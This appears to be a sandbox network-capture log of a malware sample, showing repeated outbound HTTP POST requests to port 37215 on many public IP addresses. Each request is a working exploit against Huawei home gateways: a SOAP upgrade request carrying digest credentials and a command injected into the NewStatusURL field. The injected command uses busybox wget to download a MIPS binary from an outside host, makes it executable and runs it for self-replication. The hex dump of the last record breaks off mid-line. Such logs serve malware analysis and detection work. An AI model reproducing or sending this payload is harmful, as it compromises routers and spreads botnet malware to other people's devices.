                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1306192.168.2.153912841.181.212.7837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.781874895 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1307192.168.2.1555324158.198.119.21037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.781943083 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1308192.168.2.155971476.58.121.3437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.782064915 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1309192.168.2.153963441.76.24.737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.782107115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1310192.168.2.1547300157.107.255.9937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.782169104 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1311192.168.2.154469841.14.86.14237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.795953035 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1312192.168.2.1556186157.49.43.2937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.796039104 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1313192.168.2.1532840157.248.183.15237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.796061039 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1314192.168.2.1551040202.69.17.10037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.796089888 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1315192.168.2.153409641.185.211.5437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.796402931 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 